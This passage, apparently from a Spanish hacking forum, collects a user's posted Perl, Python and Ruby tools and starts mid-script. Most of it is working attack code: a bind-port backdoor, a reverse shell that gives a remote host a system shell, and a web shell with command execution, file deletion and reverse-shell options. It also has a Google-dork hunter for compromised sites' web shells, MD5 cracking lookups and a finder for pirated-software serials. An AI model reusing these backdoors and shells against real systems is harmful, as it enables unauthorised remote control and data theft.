use Win32;
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}
} 

sub conectar {
print "[+] Listening\n";
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
use Win32;
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End ?

Esta nueva version surgio de la mezcla de estos dos codigos que habia hecho

heaven_door.pl

Código (perl) [Seleccionar]


#!usr/bin/perl
#Heaven_Door is a backdoor in Perl
#Coded By Doddy Hackman

use IO::Socket::INET;
use Net::hostent; 
use Cwd;
use Win32;

$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => '25256',
Listen    => SOMAXC,
Reuse     => 1);



print "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";


while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

sub extras {

if ($^O =~//ig) {
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}

reverse_shell.pl

Código (perl) [Seleccionar]


#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) { 
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End

#339

Scripting / [Perl] GenWordlist 0.2

1 Diciembre 2011, 22:12 PM

Simple programa en perl para generar diccionarios

Código (perl) [Seleccionar]


#!usr/bin/perl 
#Gen Wordlist 0.2
#By Doddy H
#ppm install http://www.bribes.org/perl/ppm/HTML-Strip.ppd

use LWP::UserAgent;
use HTML::Strip;

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

head();
unless($ARGV[0]) {
sintax();
} else {
start($ARGV[0]);
}
copyright();

sub start {

print "\n[+] Getting source code of the page\n";

my @contenido = toma($_[0]);
my $uno = HTML::Strip->new(emit_spaces => 1);
for my $tengo(@contenido) {
my @parteuno = $uno->parse($tengo);
push(@palabras,@parteuno);
}

for(@palabras) {
push @palabrasx, split q[ ];
}

my @final = repes(@palabrasx);

print "\n[+] Words Found : ".int(@final)."\n\n";

for my $aca(@final) {
print "[+] Word : $aca\n";
}

}

sub sintax {
print "\n[+] sintax : $0 <web>\n";
}

sub head {
print "\n\n-- == Gen Wordlist == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub toma {
return $nave->get( $_[0] )->content;
}

# The End ?

#340

Scripting / [Perl] FinderText 0.1

1 Diciembre 2011, 22:11 PM

Un simple programa para buscar cierto texto en un archivo o directorio.

Código (perl) [Seleccionar]

#!usr/bin/perl
#FinderText 0.1 
#Written by Doddy H

print "\n-- == FinderText 0.1 == --\n\n";
unless($ARGV[0]) {
print "\n[+] sintax : $0 <file/dir> <text>\n";	
} else {
print "\n[+] Searching text\n\n";
if (-f $ARGV[0]) {
verificar($ARGV[0],$ARGV[1]);
}
if (-d $ARGV[0]) { 
goodbye($ARGV[0],$ARGV[1]);
}
print "\n[+] Finished\n";
}
print "\n\n[+] Written By Doddy H\n\n";

sub verificar {

my ($file,$text) = @_;
my $numero_linea = 0;

open(FILE,$file);
my @words = <FILE>;
close FILE;

chomp @words;

for my $linea(@words) {
chomp $linea;
$numero_linea++;
if ($linea=~/$text/ig) {
print "[+] Text $text Found in file $file in line $numero_linea\n"; 
}}}

sub goodbye {

opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;

for (@archivos) {
next if $_ eq "." or $_ eq "..";
my $fichero = $_[0]."/".$_;

if (-f $fichero) {
verificar($fichero,$_[1]);
}

if (-d $fichero) {
&goodbye($fichero);
}}}

# The End ?

#341

Scripting / [Perl] FinderShells 0.3

1 Diciembre 2011, 22:11 PM

Simple programa para buscar phpshells activas usando google

Código (perl) [Seleccionar]

#!/usr/bin/perl
#Finder Shells 0.3 (c) Doddy Hackman 2011

use LWP::UserAgent;
use HTTP::Request::Common;

installer();

my $nave = LWP::UserAgent->new();
$nave->timeout(3);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

&head;

print "\n[Pages] : ";
chomp(my $pa = <stdin>);

$option = men();

if ($option eq 1) {
@pages = google("www.google.com.ar","intitle:\"- c99shell\"",$pa);
print "\n[+] Count Pages : ".int(@pages)."\n\n";	
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/--\[ c99shell/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}
}
elsif ($option eq 2) {
@pages = google("www.google.com.ar","intitle:\"r57shell\"",$pa);	
print "\n[+] Count Pages : ".int(@pages)."\n\n";
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/o---\[ r57shell - http-shell by RST/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}
}
elsif ($option eq 3) {
@pages = google("www.google.com.ar","intitle:\"--= DxShell 1.0 - by o_O Tync =--\"",$pa);	
print "\n[+] Count Pages : ".int(@pages)."\n\n";
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/--= DxShell 1.0 - by o_O Tync =--/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}
}
elsif ($option eq 4) {
@pages = google("www.google.com.ar","o--\[ heroes1412 \]--",$pa);	
print "\n[+] Count Pages : ".int(@pages)."\n\n";
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/o--\[ heroes1412 \]--/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}
}
elsif ($option eq 5) {
@pages = google("www.google.com.ar","Locus7Shell",$pa);
print "\n[+] Count Pages : ".int(@pages)."\n\n";
for my $pax(@pages) {
$code = toma($pax);
if ($code=~/--\[ x2300 Locus7Shell/ig) {
print "\a[Link] : ".$pax."\n";
savefile("shells.txt",$pax);
}
}	
}
else {
print "\n\n[-] Bad Option\n\n";
}
print "\n\n[+] Finish\n\n";
copyright();
<stdin>;


sub men {
print "\n\n[+] Shells to find : \n\n";
print "[1] : c99\n";
print "[2] : r57\n";
print "[3] : Dxshell\n";
print "[4] : heroes1412\n";
print "[5] : Locus7Shell\n\n";
print "\n[Options] : ";
chomp(my $option = <STDIN>);
return $option;
}


sub head {
print "\n\n -- == Finder Shells == --\n\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2010\n\n";
}

sub toma {
return $nave->request (GET $_[0])->content;
}

sub google {
print "\n[Dork] : $_[1]\n[Paginas] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Erasing repeated\n";
for(@founds) {
$t = $_;
push(@r,$t);
} 	
return(repes(@r));
}


sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}


sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

sub savefile {
open(SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub installer {
unless (-d "/logs") {
mkdir("logs/",777);
}
}

# ¿ The End ?

#342

Scripting / [Perl] FinderPaths 0.5

1 Diciembre 2011, 22:10 PM

Simple programa para buscar el tipico listado de directorios , lo pueden usar de dos formas , la primera es una busqueda simple y la otra al estilo spider , esta ultima nos ayuda a seguir buscando directorios escalando los encontrados

Código (perl) [Seleccionar]

#!usr/bin/perl
#Finder Paths 0.5 Coded By Doddy H

use LWP::UserAgent;
use URI::Split qw(uri_split);
use HTML::LinkExtor;
use Getopt::Long;

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

GetOptions(
"-target=s" => \$target, 
"-option=s" => \$opcion);

head();
unless ($target && $opcion) { 
sintax();
}
else  { 
if ($opcion eq "spider") {
print "\n[+] Searching in $target\n";
escalar($target); 
}
elsif($opcion eq "simple") {
print "\n[+] Searching in $target\n\n\n";
simple($target);
} else {
print "\n[-] Error\n";
}
}
copyright();

sub escalar {

my $code  = toma( $_[0] );
my @links = get_links($code);

if ( $code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
chomp $dir_found;
print "\n\n[+] Directory Found : $dir_found\n\n";
while ( $code =~ /<a href=\"(.*)\">(.*)<\/a>/ig ) {
my $ruta   = $1;
my $nombre = $2;
unless ( $nombre =~ /Parent Directory/ig or $nombre =~ /Description/ig ) {
unless ($nombre=~/\/$/) {
print "[+] File Found : $nombre\n";
}
push(@encontrados,$_[0]."/".$nombre);
}
}
}

#get more

for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
$_[0] =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
if ( $path =~ /(.*)\// ) {
my $parche = $1;                                 
unless($repetidos=~/$parche/){
$repetidos.=" ".$parche;
escalar("http://".$auth.$parche );                    
}
}
for(@encontrados) {
escalar($_);
}}}}

sub simple {

my $code  = toma($_[0]);
my @links = get_links($code);

for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
$_[0] =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
if ( $path =~ /(.*)\// ) {
my $parche = $1;                                 
unless($repetidos=~/$parche/){
$repetidos.=" ".$parche;
my $code=toma("http://".$auth.$parche);     

if ( $code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
chomp $dir_found;
print "[+] Directory Found : $dir_found\n";
}}}}}}

sub toma {
return $nave->get( $_[0] )->content;
}

sub get_links {

$test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
return @links;

sub agarrar {
my ( $a, %b ) = @_; 
push( @links, values %b );
}
}

sub head {
print "\n\n-- == FinderPaths 0.5 == --\n\n";
}

sub sintax {
print "\n[+] Sintax : $0 -target <web> -option <simple/spider>\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

# The End ?

#343

Scripting / [Perl] DestroyerShells 0.3

1 Diciembre 2011, 22:09 PM

Un programa para buscar phpshells en nuestra computadora y poder borrarlas si nos molesta

Código (perl) [Seleccionar]


#!usr/bin/perl
#DestroyerShells 0.3
#Writtten By Doddy H

use File::Find;

my @nombres = ("C99Shell","r57shell","DxShell","HiddenShell","~ Andr3a92 ~ Sh3ll ~","CShell","Dark Shell","GsC SheLL","N3fa5t1cA Sh3ll","ONBOOMSHELL",
"StAkeR ~ Shell","MoDDeD By KinG-InFeT","31337 Shel");
my @founds;

print "\n-- == DestroyerShells 0.3 == --\n";
unless($ARGV[0]) {
print "\n[+] sintax : $0 <dir>\n";
} else {
start($ARGV[0]);
}
print "\n\n[+] Written By Doddy H\n\n";

sub start {
my $dir = shift;
print "\n\n[+] Searching in directory $dir\n\n"; 


find(\&finder,$dir);

sub finder {
my $file = $_;
if(-f $file) {
if ($file =~ /\.txt$/ or $file =~ /\.php$/){
my $abrir = $File::Find::name;

open(FILE,$abrir);
my $words = join q(),<FILE>;
close(FILE);

for my $rastro(@nombres) {
chomp $rastro;
if ($words=~/$rastro/ig) {
push(@founds,$abrir);
}}}}}

my @founda = repes(@founds);

print "[+] Number of files found : ".int(@founda)."\n\n";

if (int(@founda) ne "0") {
for(@founda) {
print "[+] File Found : $_\n";
}

print "\n[+] Delete files y/n : ";
chomp(my $op=<stdin>);

if ($op=~/y/ig) {
for(@founda) { unlink($_);}
print "\n[+] Files Deleted\n";
} 
elsif ($op=~/n/ig) {
print "\n[+] Good Bye\n"; 
} else {
print "\n[+] Write good stupid\n";
}
}
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

# The End ?

#344

Scripting / [Perl Tk] SerialFinder 0.2

1 Diciembre 2011, 22:09 PM

Simple programa en tk para buscar seriales de programas o juegos

Código (perl) [Seleccionar]

#!usr/bin/perl
#SerialFinder 0.2
#By Doddy H

use Tk;
use Tk::PNG;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

my $ventana = MainWindow->new();
$ventana->title("SerialFinder 0.2 By Doddy H");
$ventana->geometry("370x300+20+20");
$ventana->resizable(0,0);

$ventana->Label(-font=>"Impact1",-text=>"String : ")->place(-x=>20,-y=>20);
my $p = $ventana->Entry(-text=>"Nero",-width=>"31")->place(-x=>80,-y=>23);
$ventana->Button(-width=>"10",-text=>"Load",-command=>\&now)->place(-x=>278,-y=>23);

$ventana->Label(-text=>"Options",-font=>"Impact1")->place(-x=>140,-y=>70);

$ventana->Radiobutton(-text =>"serials.be", -value => "serials.be",-variable=> \$op)->place(-x=>130,-y=>130);
$ventana->Radiobutton(-text =>"serials.ws", -value => "serials.ws",-variable=> \$op)->place(-x=>130,-y=>160);
$ventana->Radiobutton(-text =>"cracks.vg", -value => "cracks.vg",-variable=> \$op)->place(-x=>130,-y=>190);
$ventana->Radiobutton(-text =>"serialportal.com", -value => "serialportal.com",-variable=> \$op)->place(-x=>130,-y=>220);
$ventana->Radiobutton(-text =>"freeserials.ws", -value => "freeserials.ws",-variable=> \$op)->place(-x=>130,-y=>250);

MainLoop;

sub now {

my $link;
my $test = $p->get;

chomp $test;

if ($op eq "serials.be") {
$link = "http://www.serials.be/search_serial.php?serial=".$test;
}
elsif ($op eq "serials.ws") {
$link = "http://www.serials.ws/?chto=".$test;
}
elsif ($op eq "cracks.vg") {
$link = "http://www.cracks.vg/search.php?query=".$test;
}
elsif ($op eq "serialportal.com") {
$link = "http://www.serialportal.com/search.php?serial=".$test;
}
elsif ($op eq "freeserials.ws") {
$link = "http://www.freeserials.ws/?q=".$test."&Search=Search";
} else {
$link = "http://www.google.com.ar/search?q=como aprender a escribir";
}

system("start firefox $link");

}

# The End ?

#345

Scripting / [Perl Tk] GoogleHack 0.3

1 Diciembre 2011, 22:08 PM

Simple programa en tk para buscar en google

Código (perl) [Seleccionar]

#!usr/bin/perl
#GoogleHack 0.3 
#By Doddy H
#Based in the program GoogleHacks
use Tk;
use Tk::PNG;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

my $ventana = MainWindow->new();
$ventana->title("GoogleHack 0.3 By Doddy H");
$ventana->geometry("370x300+20+20");
$ventana->resizable(0,0);

$ventana->Label(-font=>"Impact1",-text=>"String : ")->place(-x=>20,-y=>20);
my $v = $ventana->Entry(-text=>"Test",-width=>"31")->place(-x=>80,-y=>23);
$ventana->Button(-width=>"10",-text=>"Load",-command=>\&now)->place(-x=>278,-y=>23);

$ventana->Label(-text=>"Options",-font=>"Impact1")->place(-x=>140,-y=>70);

$ventana->Radiobutton(-text =>"Music", -value => "music",-variable=> \$op)->place(-x=>140,-y=>130);
$ventana->Radiobutton(-text =>"Programs", -value => "programs",-variable=> \$op)->place(-x=>140,-y=>160);
$ventana->Radiobutton(-text =>"Book", -value => "book",-variable=> \$op)->place(-x=>140,-y=>190);
$ventana->Radiobutton(-text =>"Videos", -value => "videos",-variable=> \$op)->place(-x=>140,-y=>220);
$ventana->Radiobutton(-text =>"Torrent", -value => "torrent",-variable=> \$op)->place(-x=>140,-y=>250);

MainLoop;

sub now {

my $test = $v->get; 
my $link;

if ($op eq "music") {
$link = '-inurl:(htm|html|php) intitle:index of +last modified +parent directory +description +size +(.mp3|.wma|.ogg) "'.$test.'"';
}
elsif ($op eq "programs") {
$link = '-inurl:(htm|html|php) intitle:index of +last modified +parent directory +description +size +(.exe|.zip|.ddl) "'.$test.'"';
}
elsif ($op eq "book") {
$link = '-inurl:(htm|html|php) intitle:index of +last modified +parent directory +description +size +(.txt|.pps|.lit|.odt|.doc|.rtf|.zip|.rar|.pdf|.chm) "'.$test.'"';
}
elsif ($op eq "videos") {
$link = '-inurl:(htm|html|php) intitle:index of +last modified +parent directory +description +size +(.mpg|.avi|.flv|.wmv|.di) "'.$test.'"';
}
elsif ($op eq "torrent") {
$link = "$test filetype:torrent";
} else {
$link = "como aprender a escribir";
}
chomp $link;
my $final = "http://www.google.com.ar/search?q=".$link;
system('start firefox "'.$final.'"');
}

# The End ?

#346

Scripting / [Python] PasteBin Uploader

16 Octubre 2011, 02:52 AM

Un simple programa para subir codigos a pastebin

Código (python) [Seleccionar]


#!usr/bin/python
#PasteBin Uploader (C) Doddy Hackman 2011

import urllib2,sys,re

nave = urllib2.build_opener()	
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]	

def tomar(web,vars) :
 return nave.open(web,vars).read()

def head():
 print "\n-- == PasteBin Uploader == --\n\n"

def copyright():
 print "\n(C) Doddy Hackman 2011\n"
 sys.exit(1)

def sintax():
 print "[+] paste.py <file> <title> <perl/python/ruby/php>\n"

def chubir(file,title,type):
 print "[+] Uploading file\n"
 try:
  lineas = open(file,"r").readlines()
 except:
  print "[-] Error open file\n"
  copyright()
 lin = "".join(lineas)
 try:
  code = tomar("http://pastebin.com/api_public.php","paste_code="+str(lin)+"&paste_name="+title+"&paste_format="+type+"&paste_expire_date=N&paste_private=public&submit=submit")
 except:
  print "[-] Page offline\n"
 if re.findall("Bad API request",code):
  print "[-] Error uploading file\n"
 else:
  print "[+] Enjoy : ",code+"\n"
  copyright()

head()
if len(sys.argv) != 4 : 
 sintax()
else :
 chubir(sys.argv[1],sys.argv[2],sys.argv[3])
copyright()

# The End

#347

Scripting / [Python] Proxy Tester

16 Octubre 2011, 02:52 AM

Un simple programa para testear proxies

Código (python) [Seleccionar]


#!usr/bin/python
#Proxy Tester (C) Doddy Hackman 2011

import urllib2,sys


def toma(web) :
 return nave.open(web).read()

def header() : 
 print "\n\n--== Proxy Tester ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2011\n"
 sys.exit(1)

def sintax() :
 print "\n[*] Sintax : ",sys.argv[0]," <file>"

def testar(host):
 try:
  proxy = urllib2.ProxyHandler({"http":host})
  nave = urllib2.build_opener(proxy)
  nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
  urllib2.install_opener(nave)
  urllib2.urlopen("http://127.0.0.1/sql.php")#
  print "[+] Proxy Found : "+host
 except:
  pass

header()
if len(sys.argv) != 2 : 
 sintax()
else :
 print "\n[+] Opening file\n\n"
 try: 
  hosts = open(sys.argv[1], "r").readlines()
 except	:
  print "\n[-] Error opening file\n"
 for host in hosts:
  host = host.replace("\r","").replace("\n","")
  testar(host)
copyright()

#  The End

#348

Scripting / [Python] Simple Crack Hash

16 Octubre 2011, 02:51 AM

Un simple programa para crackear hashes md5

Código (python) [Seleccionar]


#Simple Crack Hash 
#(C) DOddy Hackman 2011
#Test with 202cb962ac59075b964b07152d234b70:123

import urllib2,re,sys

nave = urllib2.build_opener(urllib2.HTTPCookieProcessor())	
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]


def head():
 print "\n\n== -- Crack Hash -- ==\n\n"

def copyright():
 print "\n\n(C) Doddy HAckman 2011\n"

def uso():
 print "\n[+] crackhash.py <hash>\n\n"

def crack(passw):
 print "\n[+] Cracking...\n\n" 
 code = toma("http://md5.hashcracking.com/search.php?md5="+passw)
 if re.findall("Cleartext of (.*) is (.*)",code):
  control = re.findall("Cleartext of (.*) is (.*)",code)
  print "[+] Password : "+control[0][1]
 else:
  print "\n[-] Not Found\n\n"
    
def toma(web):
 return nave.open(web).read()

head()

if len(sys.argv) == 2 : 
 crack(sys.argv[1])
else:
 uso()

copyright()

#349

Scripting / [Ruby] PassChecker

16 Octubre 2011, 02:50 AM

Un simple programa para crackear hashes md5

Código (ruby) [Seleccionar]



#!usr/bin/ruby
#PassChecker (C) Doddy Hackman 2011

require 'net/http'

def toma(web)
   return Net::HTTP.get_response(URI.parse(web)).body
   end

def uso()
 print "\n[+] pass.rb <hash>\n"
end


def head() 
  print "\n\n -- == PassChecker == --\n\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2011\n\n"
   exit(1)
 end

def crack(hash)

 if hash.length == 32
  print "\n[+] Cracking hash #{hash}\n\n"
  begin 
  code = toma("http://victorov.su/md5/?md5e=&md5d="+hash)
  if code=~/MD5 ðàñøèôðîâàí: <b>(.*)<\/b>/
   print "\n[+] Hash : "+$1+"\n"
  else
   print "\n[-] Pass not crack\n"
   end
  rescue
  print "\n[-] Page offline\n"
  end
 else
  print "\n[-] Dont Hash\n\n"
end


end
 

head()
if !ARGV[0] 
 uso()
else 
 crack(ARGV[0])  
end
copyright()

#350

Scripting / [Ruby] PasteBin Uploader

16 Octubre 2011, 02:50 AM

Un simple programa para subir codigos a pastebin

Código (ruby) [Seleccionar]


#!usr/bin/ruby
#PasteBin Uploader  (C) Doddy Hackman 2011

require "net/http"

def head()
 print "\n\n-- == PasteBin Uploader\n\n\n"
end

def copyright()
 print "\n\n(C) Doddy Hackman 2011\n\n"
 exit(1)
end

def uso()
 print "\n[+] up.rb <file> <titulo> <tipo>\n"
end

def tomar(web,par)
   return Net::HTTP.post_form(URI.parse(web),par).body
   end

def subir(file,titulo,tipo)

begin
archivo = File.open(file)
lineas = archivo.readlines
rescue
print "\n[-] Error open file\n" 
end

print "[+] Uploading file\n\n"

code = tomar("http://pastebin.com/api_public.php",{"paste_code" =>lineas,"paste_name"=>titulo,"paste_format"=>tipo,"paste_expire_date"=>"N","paste_private"=>"public","submit"=>"submit"})

if code=~/Bad API request/
 print "[-] Error uploading\n"
else
 print "[+] Enjoy : "+code+"\n"

end
end

file = ARGV[0]
titulo = ARGV[1]
tipo = ARGV[2]

head()
if !file and !titulo and !tipo
 uso()
else
 subir(file,titulo,tipo)
end
copyright()

# ¿ The End ?

#351

Scripting / [Ruby] Proxy Tester

16 Octubre 2011, 02:49 AM

Un simple programa para testear proxies

Código (ruby) [Seleccionar]


#!usr/bin/ruby
#ProxyTester (C) Doddy Hackman 2011

require 'net/http'


def uso
  print "\n[+] proxy.rb <file>\n"
end

def head() 
  print "\n\n -- == Proxy Tester == --\n\n"
end

def copyright() 
   print "\n\n(C) Doddy Hackman 2011\n\n"
   exit(1)
 end
 
def testar(tengo)

if tengo=~/(.*):(.*)/
 host = $1
 port = $2
 begin
 
 new = Net::HTTP.new(proxy=host,proxy_port=port)
 code = new.get("http://127.0.0.1/sql.php")#http://www.petardas.com
 case code
  when Net::HTTPSuccess
  print "[Proxy Found] : #{host}:#{port}\n"
 end
 rescue
 end
 end
 end

 
head()
if !ARGV[0] 
  uso()
else 
 archivo = File.open(ARGV[0])
 print "\n[+] Scanning file\n\n\n"
 lineas = archivo.readlines
 lineas.each {
 |linea|
 linea = linea.chomp
 testar(linea) #funcion
 }
 archivo.close
 copyright()  
end
copyright()

# ¿ The End ?

#352

Scripting / [Perl] Commander

14 Octubre 2011, 15:28 PM

Bueno este programa es un webserver en perl con la siguientes opciones

* Listar directorios
* Ver archivos
* Borrar directorios y archivos
* ReverseShell
* BindPort

Código (perl) [Seleccionar]

#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2011
#Version 0.1
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use HTML::Entities;
use URI::Escape;
use Win32;
use Net::hostent; 

my $port = rep();

sub rep {
unless($ARGV[0]) {
return int("666"); #Your Can Edit 666
} else {
return int($ARGV[0]);
}
}

print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2011\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";


my $sock = new IO::Socket::INET(
LocalHost => 'localhost',
LocalPort => $port,
Proto     => 'tcp',
Listen    => SOMAXCONN,
Reuse     => 1);


while ($jebus = $sock->accept()) {


print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";
#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
next if $slave=fork;

close $sock;

while ($response = <$jebus>) {

chomp($response);

my %rta;


if ($response=~/GET/ig) {
capturar($response);
}


sub capturar {
my $aa = shift;
chomp $aa;
if ($aa=~/GET \/(.*) HTTP\/1.1/ig) {
my $todo = $1;
if ($todo=~/\?(.*)=(.*)&(.*)=(.*)/ig) {
$rta{$1} = $2;
$rta{$3} = $4;
}
if ($todo=~/\?(.*)=(.*)/ig) {
$rta{$1} = $2;
} 
}


}

print $jebus "

<html><body><title>Commander (C) Doddy Hackman 2011</title>

<style type=text/css>

.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: cyan;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:cyan;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:cyan; 
border: solid 1px cyan;
border-color:cyan
}

a:link,a:visited,a:active {
color: cyan;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>


<h2><center>Commander WebShell</center></h2>

";


if ($rta{'loadfile'}) {

my $file = uri_unescape($rta{'loadfile'});


print $jebus "<br><h2><center>File ".$file."</h2></center><br><br>";

if (-f $file) {

print $jebus "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$file);
@words = <FILE>;
close FILE;

for (@words) {
print $jebus HTML::Entities::encode($_);
}
print $jebus "
</textarea></center>
</center><br><br>
</form>
";

exit(1);
}
}

print $jebus "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print $jebus qx($rta{'cmd'});
}


elsif ($rta{'loadir'}) {
my $dir = uri_unescape($rta{'loadir'});
print "recibi $dir\n\n";
if (-d $dir) {
opendir DIR,$dir;
my @archivos = readdir DIR;
close DIR;

for(@archivos) {

if (-d $_) {
print $jebus "<b>".$_."</b><br>"; 	
} else {
print $jebus $_."<br>";
}}}}

elsif ($rta{'delfile'}) {

my $file = uri_unescape($rta{'delfile'});


if (-f $file) {

if (unlink($file)) {
print $jebus "<script>alert('File Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'deldir'}) {

my $dir = uri_unescape($rta{'deldir'});

if (-d $dir) {
if (rmdir($dir)) {
print $jebus "<script>alert('Directory Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'ipconnect'}) {
print $rta{'ipconnect'}."\n";
print $rta{'port'}."\n";
conectar($rta{'ipconnect'},$rta{'port'});
tipo();

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
